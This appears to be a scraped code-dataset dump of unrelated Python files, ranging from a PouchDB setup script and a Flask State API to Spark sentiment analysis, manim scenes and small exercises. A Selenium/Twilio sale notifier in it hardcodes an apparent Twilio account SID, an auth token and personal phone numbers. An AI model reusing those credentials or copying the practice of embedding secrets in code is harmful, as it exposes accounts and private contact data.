fw.write(',' + xloc + ',')\n else:\n fw.write(xloc + ',')\n fw.write('|')\n fw.write('\n')\n fw2.write(str(table))\n\n fw.close()\n fw2.close()\n","sub_path":"make_lncdatatable.py","file_name":"make_lncdatatable.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"488354263","text":"#!/usr/bin/env python\n#\n#\tCopyright 2013-2014, Marten de Vries\n#\n#\tLicensed under the Apache License, Version 2.0 (the \"License\");\n#\tyou may not use this file except in compliance with the License.\n#\tYou may obtain a copy of the License at\n#\n#\thttp://www.apache.org/licenses/LICENSE-2.0\n#\n#\tUnless required by applicable law or agreed to in writing, software\n#\tdistributed under the License is distributed on an \"AS IS\" BASIS,\n#\tWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\tSee the License for the specific language governing permissions and\n#\tlimitations under the License.\n\nfrom setuptools import setup, Command\nimport os\nimport shlex\nimport subprocess\n\ninfo = {}\nwith open(os.path.join(\"pouchdb\", \"info.py\")) as f:\n\texec(f.read(), info)\n\nclass ScriptCommand(Command):\n\tuser_options = []\n\tworking_dir = \".\"\n\n\tdef initialize_options(self):\n\t\tpass\n\n\tdef finalize_options(self):\n\t\tpass\n\n\tdef run(self):\n\t\tos.chdir(self.working_dir)\n\t\tself.execute(subprocess.call, [shlex.split(self.script)])\n\nclass BuildPluginsJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-plugins\"\n\tdescription = \"Builds all JavaScript plug-ins that are developed alongside Python-PouchDB.\"\n\nclass BuildBundleJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-bundle\"\n\tdescription = \"Builds the JavaScript bundle of all JS code that Python-PouchDB needs.\"\n\nclass WatchBundleJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./watch-bundle\"\n\tdescription = \"Builds and keeps up-to-date the JavaScript bundle of all JS code that Python-PouchDB needs.\"\n\nclass BuildAllJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-all\"\n\tdescription = \"Builds plug-in and bundle JavaScript files.\"\n\nclass JSHintCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./run-jshint\"\n\tdescription = \"Tests all JavaScript files using JSHint for style errors.\"\n\nclass NodeTestsCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./run-test\"\n\tdescription = \"Runs the NodeJS tests for the plug-ins. 
(Only a few basic checks.)\"\n\nclass NodeDependenciesCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./install-node-dependencies\"\n\tdescription = \"Install all node dependencies for the modules in the js subdirectory.\"\n\nclass ExtensiveTestCommand(ScriptCommand):\n\tscript = \"python runtests.py\"\n\tdescription = \"Run the test suite generating Python coverage and with different Python/Qt versions.\"\n\nclass SimpleTestCommand(ScriptCommand):\n\tscript = \"python -m unittest pouchdb.tests\"\n\tdescription = \"Run the test suite in one version of Python with only one type of Qt binding.\"\n\nclass JSCoverageCommand(ScriptCommand):\n\tscript = \"python jscoverage.py\"\n\tdescription = \"Runs the basic test suite and gathers JS coverage info.\"\n\nsetup(\n\tname=info[\"name\"],\n\tversion=info[\"__version__\"],\n\tdescription=\"A Python interface to PouchDB\",\n\tlong_description=\"\"\"Python-PouchDB provides an interface to all the\ngoodness of the PouchDB JavaScript library (http://pouchdb.com/). It's\nreleased under the Apache License v2 and it also offers a synchronous\nAPI.\n\nUses QtWebKit internally, so either PySide, PyQt4 or PyQt5 is required.\"\"\",\n\tauthor=info[\"__author__\"],\n\tauthor_email=\"marten@openteacher.org\",\n\turl=\"http://python-pouchdb.marten-de-vries.nl/\",\n\tclassifiers=[\n\t\t\"Development Status :: 5 - Production/Stable\",\n\t\t\"Intended Audience :: Developers\",\n\t\t\"License :: OSI Approved :: Apache Software License\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: Microsoft :: Windows\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Programming Language :: JavaScript\",\n\t\t\"Programming Language :: Python :: 2\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Topic :: Database\",\n\t\t\"Topic :: Software Development :: Libraries\",\n\t],\n\tpackages=[\"pouchdb\", \"pouchdb.tests\"],\n\tpackage_data={\n\t\t\"pouchdb\": [\"bundle.js\"],\n\t},\n\tinstall_requires=[\n\t\t\"jsonpickle\",\n\t\t\"python-dateutil\",\n\t],\n\ttest_suite=\"pouchdb.tests\",\n\tuse_2to3=True,\n\tcmdclass={\n\t\t\"build_plugins_js\": BuildPluginsJSCommand,\n\t\t\"build_bundle_js\": BuildBundleJSCommand,\n\t\t\"watch_bundle_js\": WatchBundleJSCommand,\n\t\t\"build_all_js\": BuildAllJSCommand,\n\t\t\"jshint\": JSHintCommand,\n\t\t\"node_tests\": NodeTestsCommand,\n\t\t\"install_node_dependencies\": NodeDependenciesCommand,\n\t\t\"extensive_test\": ExtensiveTestCommand,\n\t\t\"test\": SimpleTestCommand,\n\t\t\"js_coverage\": JSCoverageCommand,\n\t},\n)\n","sub_path":"pypi_install_script/Python-PouchDB-0.4.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210091359","text":"#!/usr/bin/python\n\n#\n# Copyright (c) 2018 Juniper Networks, Inc. 
All rights reserved.\n#\n\nfrom ansible.module_utils.basic import AnsibleModule\n\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'network'}\n\nDOCUMENTATION = '''\n---\nThis module maps the given SNMP OID to its vendor and family and checks for a\nsupported device family.\n\noid_to_vendor_family:\n oid: The SNMP OID from the snmp_facts module return parameter\n ansible_facts.ansible_sysobjectid.\n host: IP address\n hostname: hostname of the IP/host from the snmp_facts module return parameter\n ansible_facts.ansible_sysname.\n'''\n\nEXAMPLES = '''\noid_to_vendor_family:\n oid: \"1.3.6.1.4.1.2636.1.1.1.2.29\"\n host: \"10.155.67.7\"\n hostname: \"cloudcpe\"\n'''\n\nRETURN = '''\nReturns three parameters. The vendor, family and product for a given\nhost is returned back to the caller.\n'''\n\noid_mapping = {\n \"1.3.6.1.4.1.2636.1.1.1.4.82.8\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-qfx\",\n \"product\": \"qfx5100\"},\n \"1.3.6.1.4.1.2636.1.1.1.4.82.5\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-qfx\",\n \"product\": \"qfx5100\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.29\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"mx240\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.11\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"m10i\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.57\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"mx80\"}\n}\n_output = {'job_log_message': '', 'oid_mapping': {}}\n\n\ndef find_vendor_family(module):\n\n mapped_value = {}\n\n if module.params['oid'] in oid_mapping:\n mapped_value['host'] = module.params['host']\n mapped_value['hostname'] = module.params['hostname']\n mapped_value.update(oid_mapping[module.params['oid']])\n _output['job_log_message'] += \"\\nTask: OID MAPPING: \" + \\\n \"vendor and product for the host: \" + \\\n mapped_value['host'] + \" is \" + str(mapped_value)\n else:\n _output['job_log_message'] += \"\\nTask: OID MAPPING: \" + \\\n \"device with oid \" + \\\n module.params['oid'] + \" NOT supported\"\n\n return mapped_value\n\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n oid=dict(required=True),\n host=dict(required=True),\n hostname=dict(required=True)\n ),\n supports_check_mode=True\n )\n\n mapped_value = find_vendor_family(module)\n\n _output['oid_mapping'] = mapped_value\n\n module.exit_json(**_output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/config/fabric-ansible/ansible-playbooks/library/oid_to_vendor_family.py","file_name":"oid_to_vendor_family.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"255046886","text":"# Huffington Post News Data - (2012-2016)\nimport sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkContext\nimport re\nfrom textblob import TextBlob\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql import SparkSession, functions, types\nimport pandas as pd\nimport glob\n\nsc = SparkContext.getOrCreate()\nspark = SparkSession(sc)\n\n###################################################\ndef main(inputs, output):\n\n\tnews_schema = types.StructType([\n\ttypes.StructField('id', types.IntegerType(), False),\n\ttypes.StructField('id2', types.IntegerType(), False),\n\ttypes.StructField('authors', types.StringType(), 
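# the third StructField argument is Spark's nullable flag (False = column is required)\n\t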
False),\n\ttypes.StructField('category', types.StringType(), False),\n\ttypes.StructField('date', types.StringType(), False),\n\ttypes.StructField('headline', types.StringType(), False),\n\ttypes.StructField('link', types.StringType(), False),\n\ttypes.StructField('short_description', types.StringType(), False),\n\ttypes.StructField('body', types.StringType(), False),])\n\n\tpd.set_option('display.max_colwidth', -1)\n\t# read multiple csv files\n\tnews_data = pd.concat([pd.read_csv(f) for f in glob.glob(inputs + '/*.csv')], ignore_index = True)\n\t# create pyspark dataframe\n\tdf_news_data = spark.createDataFrame(news_data,schema=news_schema)\n\n\t#### Facebook-related words\n\tFACEBOOK_Word_list = ['facebook']\n\tjoint_words = ['mark zuckerberg']\n\n\t## UDF to filter out unwanted news ##############################################\n\t@functions.udf(returnType=types.StringType())\n\tdef filter_fb_news(body):\n\n\t\tbody = body.lower()\n\n\t\tfound = False\n\n\t\tfor word in body.split():\n\t\t\tif word in FACEBOOK_Word_list:\n\t\t\t\tfound = True\n\n\t\tif not found:\n\t\t\tfor phrase in joint_words:\n\t\t\t\tif phrase in body:\n\t\t\t\t\tfound = True\n\n\t\tif found:\n\t\t\treturn 'FB'\n\n\t####################################################\n\t@functions.udf(returnType=types.StringType())\n\tdef count_company_frequency(body):\n\t\tbody = body.lower()\n\t\tcount = 0\n\t\tfor i in FACEBOOK_Word_list:\n\t\t\tcount = body.count(i) + count\n\t\treturn count\n\n\t###################################################\n\n\t# clean body ###########################################################################\n\t@functions.udf(returnType=types.StringType())\n\tdef clean_text(body):\n\t\tbody = body.encode('ascii', 'ignore').decode('ascii')\n\t\treturn ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t]) |(\\w+:\\/\\/\\S+)\", \" \", body).split())\n\n\t###################################################\n\t@functions.udf(returnType=types.FloatType())\n\tdef process_body(text):\n\t\tanalysis = TextBlob(text)\n\t\treturn analysis.sentiment.polarity\n\t###################################################\n\t# keep only Facebook-related news\n\tdf_headline = df_news_data.withColumn('company', filter_fb_news(df_news_data.body))\n\t# retain FB related records only\n\tdf_frequency = df_headline.filter(df_headline.company == 'FB')\n\t# count the number of times a Facebook-related word is found in the body\n\tdf_frequency = df_frequency.withColumn('company_frequency', count_company_frequency(df_headline.body))\n\t# retain the records if at least 1 Facebook-related word is present\n\tdf_frequency = df_frequency.filter(df_frequency.company_frequency >= 1)\n\t# clean body text\n\tdf_cleaned = df_frequency.withColumn('body_clean', clean_text(df_frequency.body))\n\t# clean headline text\n\tdf_cleaned = df_cleaned.withColumn('headline_clean', clean_text(df_frequency.headline))\n\t# generate text sentiment from body_clean\n\tdf_sentiment = df_cleaned.withColumn('sentiment', process_body(df_cleaned.body_clean))\n\n\t# calculate median ############################################################################################################\n\tdf_sentiment.registerTempTable(\"medianTbl\")\n\tdf_median = spark.sql(\"SELECT date, percentile_approx(sentiment, 0.5) as median_sentiment from medianTbl group by date \")\n\tspark.catalog.dropTempView(\"medianTbl\")\n\n\t###### AGGREGATIONS ###################################################################\n\n\t## 
WEIGHTED SENTIMENTS\n\tdf_sentiment = df_sentiment.withColumn('weighted_sentiment', df_sentiment.company_frequency * df_sentiment.sentiment)\n\n\t# aggregations to generate features grouped by date\n\tdf_summary = df_sentiment.groupby(df_sentiment.date).agg(functions.count(df_sentiment.sentiment).alias('count_news'),\n\tfunctions.avg(df_sentiment.sentiment).alias('avg_sentiment'),\n\tfunctions.sum(df_sentiment.company_frequency).alias('sum_company_frequency'),\n\tfunctions.max(df_sentiment.company_frequency).alias('max_company_frequency'),\n\tfunctions.sum(df_sentiment.weighted_sentiment).alias('sum_weighted_sentiment'),\n\tfunctions.avg(df_sentiment.weighted_sentiment).alias('avg_weighted_sentiment_1')\n\t)\n\n\t# calculate avg_weighted_sentiment_2\n\tdf_summary = df_summary.withColumn('avg_weighted_sentiment_2', df_summary.sum_weighted_sentiment/df_summary.sum_company_frequency)\n\n\t# join df_summary and df_sentiment\n\tdf_summary = df_sentiment.join(df_summary, [df_summary.date==df_sentiment.date,df_summary.max_company_frequency==df_sentiment.company_frequency]).select(df_summary.date, \\\n\tdf_summary.count_news,df_summary.avg_sentiment,df_summary.sum_company_frequency,df_summary.max_company_frequency, \\\n\tdf_summary.sum_weighted_sentiment, df_summary.avg_weighted_sentiment_1,df_summary.avg_weighted_sentiment_2,df_sentiment.headline.alias('headline_original'), df_sentiment.headline_clean)\n\n\t# join the df_summary dataframe with df_median on date field\n\tdf_summary = df_summary.join(df_median, ['date'])\n\n\t# Select the required fields\n\tdf_summary = df_summary.select(df_summary.date, \\\n\tdf_summary.count_news,df_summary.avg_sentiment,df_summary.median_sentiment, df_summary.sum_company_frequency,df_summary.max_company_frequency, \\\n\tdf_summary.sum_weighted_sentiment, df_summary.avg_weighted_sentiment_1,df_summary.avg_weighted_sentiment_2, \\\n\tdf_summary.headline_original, df_summary.headline_clean)\n\n\t# drop duplicates (if any)\n\tdf_summary = df_summary.dropDuplicates(['date'])\n\n\t# save the output as 1 csv file\n\tdf_summary.repartition(1).write.csv(output,header=True)\n\n\t###################################################\nif __name__ == '__main__':\n\tinputs = sys.argv[1]\n\toutput = sys.argv[2]\n\tmain(inputs, output)\n","sub_path":"HuffingtonNewsSentimentFacebook.py","file_name":"HuffingtonNewsSentimentFacebook.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"487292760","text":"import os, sys\n\nos.chdir(os.path.dirname(__file__))\nsys.path.append(os.path.dirname(__file__))\n\n\ndef app(environ, start_response):\n header = [(\"Content-Type\", \"text/html\")]\n start_response(\"200 OK\", header)\n content = \"TEST OUTPUT!\"\n # WSGI response bodies must be bytes, not str, under Python 3\n return [content.encode('utf-8')]\n\napplication = app\n\nif __name__ == '__main__':\n from werkzeug.serving import run_simple\n\n run_simple('localhost', 8080, application, use_reloader=True, use_debugger=True)","sub_path":"Testing/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"565388240","text":"from manimlib.imports import *\n\nclass Grid(VGroup):\n CONFIG = {\n \"height\": 6.0,\n \"width\": 6.0,\n }\n\n def __init__(self, rows, columns, **kwargs):\n digest_config(self, kwargs, locals())\n super().__init__(**kwargs)\n\n x_step = self.width / self.columns\n y_step = self.height / self.rows\n\n for x in np.arange(0, 
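# np.arange stops before its upper bound, so width + x_step keeps the final grid line at x == width\n 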
self.width + x_step, x_step):\n self.add(Line(\n [x - self.width / 2., -self.height / 2., 0],\n [x - self.width / 2., self.height / 2., 0],\n ))\n for y in np.arange(0, self.height + y_step, y_step):\n self.add(Line(\n [-self.width / 2., y - self.height / 2., 0],\n [self.width / 2., y - self.height / 2., 0]\n ))\n\n\nclass ScreenGrid(VGroup):\n CONFIG = {\n \"rows\": 8,\n \"columns\": 14,\n \"height\": FRAME_Y_RADIUS * 2,\n \"width\": 14,\n \"grid_stroke\": 0.5,\n \"grid_color\": WHITE,\n \"axis_color\": RED,\n \"axis_stroke\": 2,\n \"labels_scale\": 0.125,\n \"labels_buff\": 0,\n \"number_decimals\": 0\n }\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n rows = self.rows\n columns = self.columns\n grid = Grid(width=self.width, height=self.height, rows=rows, columns=columns)\n grid.set_stroke(self.grid_color, self.grid_stroke)\n\n vector_ii = ORIGIN + np.array((- self.width / 2, - self.height / 2, 0))\n vector_si = ORIGIN + np.array((- self.width / 2, self.height / 2, 0))\n vector_sd = ORIGIN + np.array((self.width / 2, self.height / 2, 0))\n\n axes_x = Line(LEFT * self.width / 2, RIGHT * self.width / 2)\n axes_y = Line(DOWN * self.height / 2, UP * self.height / 2)\n\n axes = VGroup(axes_x, axes_y).set_stroke(self.axis_color, self.axis_stroke)\n\n divisions_x = self.width / columns\n divisions_y = self.height / rows\n\n directions_buff_x = [UP, DOWN]\n directions_buff_y = [RIGHT, LEFT]\n dd_buff = [directions_buff_x, directions_buff_y]\n vectors_init_x = [vector_ii, vector_si]\n vectors_init_y = [vector_si, vector_sd]\n vectors_init = [vectors_init_x, vectors_init_y]\n divisions = [divisions_x, divisions_y]\n orientations = [RIGHT, DOWN]\n labels = VGroup()\n set_changes = zip([columns, rows], divisions, orientations, [0, 1], vectors_init, dd_buff)\n for c_and_r, division, orientation, coord, vi_c, d_buff in set_changes:\n for i in range(1, c_and_r):\n for v_i, directions_buff in zip(vi_c, d_buff):\n ubication = v_i + orientation * division * i\n coord_point = round(ubication[coord], self.number_decimals)\n label = Text(f\"{coord_point}\",font=\"Arial\",stroke_width=0).scale(self.labels_scale)\n label.next_to(ubication, directions_buff, buff=self.labels_buff)\n labels.add(label)\n\n self.add(grid, axes, labels)\n\n\n\ndef get_coords_from_csv(file_name):\n import csv\n coords = []\n with open(f'{file_name}.csv', 'r') as csvFile:\n reader = csv.reader(csvFile)\n for row in reader:\n x,y = row\n coord = [float(x),float(y)]\n coords.append(coord)\n csvFile.close()\n return coords\n\nclass ConstLattice(Scene):\n def construct(self):\n m = []\n n = []\n\n for i in range(2):\n i = float( input(\"Enter the scalars of the first vector, entry [\"+str(i+1)+\"] : \"))\n m.append(i)\n print(\"\")\n\n for j in range(2):\n j = float( input(\"Enter the scalars of the second vector, entry [\"+str(j+1)+\"] : \"))\n n.append(j)\n\n n.append(0)\n m.append(0)\n\n v_1 = np.array(m)\n v_2 = np.array(n)\n\n screen_grid = ScreenGrid()\n self.add(screen_grid)\n\n self.play(FadeIn(Vector(v_1, color = BLUE)))\n self.play(FadeIn(Vector(v_2, color = GREEN)))\n\n vectors1 = {}\n vectors2 = {}\n\n #coords = get_coords_from_csv(\"../custom_graphs/data\")\n #dots = self.get_dots_from_coords(coords)\n #self.add(dots)\n\n\n\n for i in range(-3, 3):\n vectors1[i] = i * v_1\n vectors2[i] = i * v_2\n self.play( FadeIn( Vector(vectors1[i], color = BLUE, stroke = 0.09), run_time = 0.125) )\n self.play( ReplacementTransform(Vector(vectors1[i]), Dot(vectors1[i])), run_time = 0.125 )\n self.play( 
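# draw the scaled copies of v_2; the matching Dot conversion is left commented out below\n 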
FadeIn(Vector(vectors2[i], color = GREEN, stroke = 0.09), run_time = 0.125) )\n #self.play( ReplacementTransform(Vector(vectors2[i]), Dot(vectors2[i])), run_time = 0.125 )\n\n vector_sum = {}\n\n for j in reversed(range(-3, 3)):\n for i in reversed(range(-3, 3)):\n vector_sum[(i,j)] = (i * v_1) + (j * v_2)\n self.play(FadeIn(Vector(vector_sum[(i,j)], color = ORANGE, stroke = 0.09), run_time = 0.125))\n #self.play(ReplacementTransform(Vector(vector_sum[(i,j)]), Dot(vector_sum[(i,j)])), run_time = 0.125)\n\n# I have not managed to get the commented-out conversions to Dot working.\n\n self.wait(5)\n\n\n","sub_path":"Learning/PlotVarVect01.py","file_name":"PlotVarVect01.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"488825378","text":"#!/usr/bin/python3\n\"\"\"State views\"\"\"\nfrom models.state import State\nfrom flask import jsonify, abort, request, Flask\nfrom api.v1.views import app_views\nfrom models import storage\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\ndef get_all_states():\n \"\"\"retrieves all state obj\"\"\"\n all_states = [obj.to_dict() for obj in storage.all(\"State\").values()]\n return jsonify(all_states)\n\n\n@app_views.route('/states/<state_id>', methods=['GET'])\ndef get_a_state(state_id):\n \"\"\"retrieves state by state id\"\"\"\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n return jsonify(obj.to_dict())\n\n\n@app_views.route('/states/<state_id>', methods=['DELETE'])\ndef del_obj(state_id):\n \"\"\"deletes a state object\"\"\"\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n obj.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/states', methods=['POST'], strict_slashes=False)\ndef create_State():\n \"\"\"create a state obj\"\"\"\n if not request.get_json():\n return jsonify({'error': 'Not a JSON'}), 400\n if 'name' not in request.get_json():\n return jsonify({'error': 'Missing name'}), 400\n dic = request.get_json()\n obj = State(**dic)\n obj.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/states/<state_id>', methods=['PUT'])\ndef update_state(state_id):\n \"\"\"updates state object\"\"\"\n if not request.get_json():\n return jsonify({'error': 'Not a JSON'}), 400\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n for k, v in request.get_json().items():\n if k not in ['id', 'created_at', 'updated_at']:\n setattr(obj, k, v)\n storage.save()\n return jsonify(obj.to_dict())\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"52009023","text":"# Written By: Gil Rael\n# sales_notifier.py will notify Gil Rael via text message if item of interest\n# is found on Calibers' sales page\n\n# import required modules\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n# this allows you to catch a thrown exception and add your own exception\n# so your script continues to run and exits normally\nfrom selenium.common.exceptions import NoSuchElementException\nfrom twilio.rest import TwilioRestClient\n\n\n# locate product of interest that is on sale at Calibers and send\n# ON SALE TODAY text message if item is on sale\n# or send NO SALE TODAY text message if item of interest is not on sale\n\ndef locate_sale_item():\n# open Firefox web browser and maximize window\n driver = 
webdriver.Firefox()\n driver.maximize_window()\n# open Caliberusa.com sales page\n driver.get(\"https://www.calibersusa.com/all-products/browse/sale/yes/orderby/sort-by-sale/perpage/150\")\n driver.implicitly_wait(30)\n try:\n elem = driver.find_element_by_partial_link_text('One Year Dual Membership')\n if elem.is_displayed():\n elem.click() # this will click the element if it is there\n client = TwilioRestClient(\"AC2c8bb5d4f471c5ccf25765e4f757b030\", \"5183d8a42f3d1a9084a4325029132058\")\n# change the \"from_\" number to your Twilio number and the \"to\" number\n# to the phone number you signed up for Twilio with, or upgrade your\n# account to send SMS to any phone number\n client.messages.create(to=\"+15058330785\", from_=\"+15057966457\",\n\n body=\"Hello from Pi!.....ON SALE TODAY! : ) Time To Buy Calibers One Year Dual Membership\")\n except NoSuchElementException:\n client = TwilioRestClient(\"AC2c8bb5d4f471c5ccf25765e4f757b030\", \"5183d8a42f3d1a9084a4325029132058\")\n# change the \"from_\" number to your Twilio number and the \"to\" number\n# to the phone number you signed up for Twilio with, or upgrade your\n# account to send SMS to any phone number\n client.messages.create(to=\"+15058330785\", from_=\"+15057966457\",\n\n body=\"Hello from Pi!.....NO SALE TODAY : ( On Calibers One Year Dual Membership\")\n driver.quit()\nlocate_sale_item();\n","sub_path":"sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"115134337","text":"import os\nimport itertools\nimport random\n\n\nclass AWEData:\n\n def __init__(self, dataset_path):\n self.path = dataset_path\n\n def prepare_ann_files(self):\n # train data\n train_path = self.path + \"/train/\"\n train_subjects = sorted(filter(lambda f: not f.startswith('.'), os.listdir(train_path)))\n train_paths = []\n train_y = []\n for train_subject in train_subjects:\n subject_path = os.path.join(train_path, train_subject + \"/\")\n subject_samples = sorted(filter(lambda f: not f.startswith('.'), os.listdir(subject_path)))\n subject_train_paths = [\"\".join(item) for item in list(itertools.product([subject_path],\n list(subject_samples)))]\n train_paths += subject_train_paths\n train_y += [str(int(train_subject))] * len(subject_samples)\n\n # permute the data randomly and write it to the file\n combined = list(zip(train_paths, train_y))\n random.shuffle(combined)\n train_paths[:], train_y[:] = zip(*combined)\n with open(\"X_train.txt\", \"w\") as train_x_out:\n train_x_out.write(\"\\r\\n\".join(train_paths))\n\n with open(\"y_train.txt\", \"w\") as train_y_out:\n train_y_out.write(\"\\r\\n\".join(train_y))\n\n print(\"Found\", len(train_paths), \"training samples!\")\n\n # validation data\n val_path = self.path + \"/val/\"\n val_subjects = sorted(filter(lambda f: not f.startswith('.'), os.listdir(val_path)))\n val_paths = []\n val_y = []\n for val_subject in val_subjects:\n subject_path = os.path.join(val_path, val_subject + \"/\")\n subject_samples = sorted(filter(lambda f: not f.startswith('.'), os.listdir(subject_path)))\n subject_val_paths = [\"\".join(item) for item in\n list(itertools.product([subject_path], list(subject_samples)))]\n val_paths += subject_val_paths\n val_y += [str(int(val_subject))] * len(subject_samples)\n\n # permute the data randomly and write it to the file\n combined = list(zip(val_paths, val_y))\n random.shuffle(combined)\n val_paths[:], val_y[:] = zip(*combined)\n with open(\"X_test.txt\", \"w\") 
as test_x_out:\n test_x_out.write(\"\\r\\n\".join(val_paths))\n\n with open(\"y_test.txt\", \"w\") as test_y_out:\n test_y_out.write(\"\\r\\n\".join(val_y))\n\n print(\"Found\", len(val_paths), \"validation samples!\")\n\n # label map\n label_map = list(map(lambda x: str(int(x)), train_subjects))\n label_map = list(zip(label_map, label_map))\n with open(\"label_map.txt\", \"w\") as label_map_out:\n label_map_out.write('\\r\\n'.join('%s,%s' % x for x in label_map))\n\n\nif __name__ == '__main__':\n awe_data = AWEData(\"AWE_dataset\")\n awe_data.prepare_ann_files()\n","sub_path":"data/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"186615418","text":"from Tools.AudioTools import wav2vc\nfrom Tools.AudioTools import speaker_verification\n\ndef find_related_file(file_type_to_search, file_begin = ''):\n res = []\n with open('audio_type.txt', 'r') as f:\n tmp = f.readline()\n while tmp:\n file_dir, file_name, file_type = tmp.split(' ')\n file_type = list(map(lambda x: int(x), file_type[1:-2].split(',')))\n if file_type_to_search in file_type:\n tmp_wav_to_add = file_dir + '//' + file_name\n if file_begin != '':\n tmp_wav_to_add = file_begin + tmp_wav_to_add\n res.append(tmp_wav_to_add)\n tmp = f.readline()\n return res\n\ndef file_path_to_name(path):\n return path.split('//')[1]\n\nif __name__ == '__main__':\n test_data = find_related_file(0, file_begin='train_wav//')\n print('The number of this kind is {} '.format(len(test_data)))\n\n res = []\n #vq_test\n len_test_data = len(test_data)\n for test_number in range(len(test_data)):\n target = wav2vc(test_data[test_number])\n target_name = file_path_to_name(test_data[test_number])\n\n tmp_data = []\n for i in range(1, len(test_data)):\n if i % 100 == 0:\n print('{} dealing {}'.format(test_number, i))\n if i == test_number:\n continue\n tmp_data.append([i, test_data[i], speaker_verification(target, test_data[i])])\n\n tmp_data_sorted = sorted(tmp_data, key=lambda x: x[2])\n nearest_number = 0\n for i in tmp_data_sorted:\n nearest_number = nearest_number + 1\n if file_path_to_name(i[1]) == target_name:\n res.append([test_number, float(nearest_number) / len_test_data])\n\n if test_number == 5:\n break\n for i in res:\n print(i)","sub_path":"resource/audio_train_data/find_related_audio.py","file_name":"find_related_audio.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"329491810","text":"n = int(input('Number: '))\r\ncont = 0\r\nfor i in range(2, n):\r\n if n % i == 0:\r\n cont += 1\r\nif cont > 0:\r\n print(\"Not prime\")\r\nelse:\r\n print(\"Prime\")","sub_path":"primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"317961097","text":"__author__ = 'fengpeng'\n\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def __init__(self):\n pass\n\n def oddEvenList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return None\n dummyOdd = preOdd = ListNode(0)\n dummyEven = preEven = ListNode(0)\n cur = head\n idx = 1\n while cur is not None:\n if idx % 2 == 0:\n preEven.next = cur\n preEven = preEven.next\n else:\n preOdd.next = cur\n preOdd = preOdd.next\n cur = 
